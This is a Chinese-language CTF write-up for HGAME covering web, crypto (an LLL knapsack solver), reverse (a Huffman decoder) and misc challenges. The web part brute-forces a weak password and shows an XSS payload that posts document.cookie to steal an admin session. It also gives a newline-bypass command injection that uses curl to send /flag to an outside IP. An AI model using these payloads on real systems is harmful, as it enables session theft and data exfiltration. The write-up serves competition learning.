HGAMEwp

WEB

Pacman

直接在源码中找通关逻辑，在index.js中就可以找到，但是有两个，之前找错了，一直交没对

拿出来base64＋栅栏2栏就行

MysteryMessageBoard

通过弱口令爆破登录shallot用户，密码888888，然后插入xss的payload后访问/admin

<script>
var xhr=new XMLHttpRequest();
xhr.open("POST", "http://127.0.0.1:8888/", true);
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xhr.send("comment=" + document.cookie);
</script>

访问后返回原页面，就能看到session

本地改session访问flag获得flag

HoneyPot

先查看go代码发现是一个sql的接口，且在远程连接输入密码时可以进行rce

题目提示有/writeflag命令且要出网，因此在密码位置构造rce，注意到

func sanitizeInput(input string) string {
  reg := regexp.MustCompile(`[;&|><\(\)\{\}\[\]\\` + "`" + `]`)
  return reg.ReplaceAllString(input, "")
}

过滤了;&等，通过换行符绕过

password%0a/writeflag%0acurl -d @/flag 47.108.237.7:4002

先连接本地

connected后通过导入数据中的密码进行rce

一段时间后访问/flag获得flag(存疑)

CRYPTO

ezBag

直接通过脚本

from sage.all import *
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad  # 添加缺失的导入

# 题目给出的数据
list = [[2826962231, 3385780583, 3492076631, 3387360133, 2955228863, 2289302839, 2243420737, 4129435549, 4249730059, 3553886213, 3506411549, 3658342997, 3701237861, 4279828309, 2791229339, 4234587439, 3870221273, 2989000187, 2638446521, 3589355327, 3480013811, 3581260537, 2347978027, 3160283047, 2416622491, 2349924443, 3505689469, 2641360481, 3832581799, 2977968451, 4014818999, 3989322037, 4129732829, 2339590901, 2342044303, 3001936603, 2280479471, 3957883273, 3883572877, 3337404269, 2665725899, 3705443933, 2588458577, 4003429009, 2251498177, 2781146657, 2654566039, 2426941147, 2266273523, 3210546259, 4225393481, 2304357101, 2707182253, 2552285221, 2337482071, 3096745679, 2391352387, 2437693507, 3004289807, 3857153537, 3278380013, 3953239151, 3486836107, 4053147071], [2241199309, 3658417261, 3032816659, 3069112363, 4279647403, 3244237531, 2683855087, 2980525657, 3519354793, 3290544091, 2939387147, 3669562427, 2985644621, 2961261073, 2403815549, 3737348917, 2672190887, 2363609431, 3342906361, 3298900981, 3874372373, 4287595129, 2154181787, 3475235893, 2223142793, 2871366073, 3443274743, 3162062369, 2260958543, 3814269959, 2429223151, 3363270901, 2623150861, 2424081661, 2533866931, 4087230569, 2937330469, 3846105271, 3805499729, 4188683131, 2804029297, 2707569353, 4099160981, 3491097719, 3917272979, 2888646377, 3277908071, 2892072971, 2817846821, 2453222423, 3023690689, 3533440091, 3737441353, 3941979749, 2903000761, 3845768239, 2986446259, 3630291517, 3494430073, 2199813137, 2199875113, 3794307871, 2249222681, 2797072793], [4263404657, 3176466407, 3364259291, 4201329877, 3092993861, 2771210963, 3662055773, 3124386037, 2719229677, 3049601453, 2441740487, 3404893109, 3327463897, 3742132553, 2833749769, 2661740833, 3676735241, 2612560213, 3863890813, 3792138377, 3317100499, 2967600989, 2256580343, 2471417173, 2855972923, 2335151887, 3942865523, 2521523309, 3183574087, 2956241693, 2969535607, 2867142053, 2792698229, 3058509043, 3359416111, 3375802039, 2859136043, 3453019013, 3817650721, 2357302273, 3522135839, 2997389687, 3344465713, 2223415097, 2327459153, 3383532121, 3960285331, 3287780827, 4227379109, 3679756219, 2501304959, 4184540251, 3918238627, 3253307467, 3543627671, 3975361669, 3910013423, 3283337633, 2796578957, 2724872291, 2876476727, 4095420767, 3011805113, 2620098961], [2844773681, 3852689429, 4187117513, 3608448149, 2782221329, 4100198897, 3705084667, 2753126641, 3477472717, 3202664393, 3422548799, 3078632299, 3685474021, 3707208223, 2626532549, 3444664807, 4207188437, 3422586733, 2573008943, 2992551343, 3465105079, 4260210347, 3108329821, 3488033819, 4092543859, 4184505881, 3742701763, 3957436129, 4275123371, 3307261673, 2871806527, 3307283633, 2813167853, 2319911773, 3454612333, 4199830417, 3309047869, 2506520867, 3260706133, 2969837513, 4056392609, 3819612583, 3520501211, 2949984967, 4234928149, 2690359687, 3052841873, 4196264491, 3493099081, 3774594497, 4283835373, 2753384371, 2215041107, 4054564757, 4074850229, 2936529709, 2399732833, 3078232933, 2922467927, 3832061581, 3871240591, 3526620683, 2304071411, 3679560821]]
bag = [123342809734, 118191282440, 119799979406, 128273451872]
ciphertext = b'\x1d6\xcc}\x07\xfa7G\xbd\x01\xf0P4^Q"\x85\x9f\xac\x98\x8f#\xb2\x12\xf4+\x05`\x80\x1a\xfa !\x9b\xa5\xc7g\xa8b\x89\x93\x1e\xedz\xd2M;\xa2'

# 参数设置
K = 2^60  # 较大的缩放因子
n = 64    # p的位数
num_equations = 4  # 四个方程

# 构造格基矩阵
rows = []
# 添加第一个行，处理目标值
row = [-K * bag[0], -K * bag[1], -K * bag[2], -K * bag[3]] + [0]*n
rows.append(row)
# 添加每个j对应的行
for j in range(n):
    a = [lst[j] for lst in list]
    new_row = [K * a[0], K * a[1], K * a[2], K * a[3]] + [0]*n
    new_row[4 + j] = 1  # 单位向量部分
    rows.append(new_row)

# 转换为整数矩阵
M = Matrix(ZZ, rows)
print("Matrix constructed. Starting LLL...")

# 执行LLL算法
L = M.LLL()
print("LLL completed. Searching for solution...")

# 寻找符合条件的行
found = False
p = None
for row in L:
    # 检查前四个元素是否为0
    if all(v == 0 for v in row[:4]):
        # 检查后面的元素是否全为0或1
        x = row[4:4+n]
        valid = True
        for bit in x:
            if bit not in (0, 1):
                valid = False
                break
        if valid:
            # 计算p的值
            p = 0
            for i in range(n):
                p += (x[i] << i)
            found = True
            break

if not found:
    print("Error: Solution not found. Try adjusting K or check the matrix construction.")
else:
    # 解密
    key = hashlib.sha256(str(p).encode()).digest()
    cipher = AES.new(key, AES.MODE_ECB)
    plaintext = cipher.decrypt(ciphertext)
    try:
        flag = unpad(plaintext, 16)  # 现在unpad已定义
        print("Flag found:", flag.decode())
    except ValueError:
        print("解密成功但填充错误，可能是p错误")
        print("解密后的字节:", plaintext)

RE

Compress dot new

直接跑脚本

import json

def rebuild_tree(node):
    if 's' in node:
        return node['s']
    else:
        return [rebuild_tree(node['a']), rebuild_tree(node['b'])]

def decode_huffman(binary_str, tree):
    result = []
    current_tree = tree
    for bit in binary_str:
        if int(bit) == 0:
            current_tree = current_tree[0]
        else:
            current_tree = current_tree[1]
        if isinstance(current_tree, int):
            result.append(current_tree)
            current_tree = tree
    return bytes(result)

# 输入的json字符串和二进制编码数据
json_input = {"a":{"a":{"a":{"a":{"a":{"s":125},"b":{"a":{"s":119},"b":{"s":123}}},"b":{"a":{"s":104},"b":{"s":105}}},"b":{"a":{"s":101},"b":{"s":103}}},"b":{"a":{"a":{"a":{"s":10},"b":{"s":13}},"b":{"s":32}},"b":{"a":{"s":115},"b":{"s":116}}}},"b":{"a":{"a":{"a":{"a":{"a":{"s":46},"b":{"s":48}},"b":{"a":{"a":{"s":76},"b":{"s":78}},"b":{"a":{"s":83},"b":{"a":{"s":68},"b":{"s":69}}}}},"b":{"a":{"a":{"s":44},"b":{"a":{"s":33},"b":{"s":38}}},"b":{"s":45}}},"b":{"a":{"a":{"s":100},"b":{"a":{"s":98},"b":{"s":99}}},"b":{"a":{"a":{"s":49},"b":{"s":51}},"b":{"s":97}}}},"b":{"a":{"a":{"a":{"s":117},"b":{"s":118}},"b":{"a":{"a":{"s":112},"b":{"s":113}},"b":{"s":114}}},"b":{"a":{"a":{"s":108},"b":{"s":109}},"b":{"a":{"s":110},"b":{"s":111}}}}}}
binary_input = "00010001110111111010010000011100010111000100111000110000100010111001110010011011010101111011101100110100011101101001110111110111011011001110110011110011110110111011101101011001111011001111000111001101111000011001100001011011101100011100101001110010111001111000011000101001010000000100101000100010011111110110010111010101000111101000110110001110101011010011111111001111111011010101100001101110101101111110100100111100100010110101111111111100110001010101101110010011111000110110101101111010000011110100000110110101011000111111000110101001011100000110111100000010010100010001011100011100111001011101011111000101010110101111000001100111100011100101110101111100010110101110000010100000010110001111011100011101111110101010010011101011100100011110010010110111101110111010111110110001111010101110010001011100100101110001011010100001110101000101111010100110001110101011101100011011011000011010000001011000111011111111100010101011100000"

# Rebuild the Huffman tree from JSON input
tree = rebuild_tree(json_input)

# Decode the binary string using the rebuilt Huffman tree
decoded_message = decode_huffman(binary_input, tree)

print(decoded_message.decode('utf-8'))

MISC

Hakuya Want A Girl Friend

一个十六进制的文件，前面是个压缩包后面是图片逆序，分出来后图片还要改高度，得到压缩包密码To_f1nd_th3_QQ，得到flag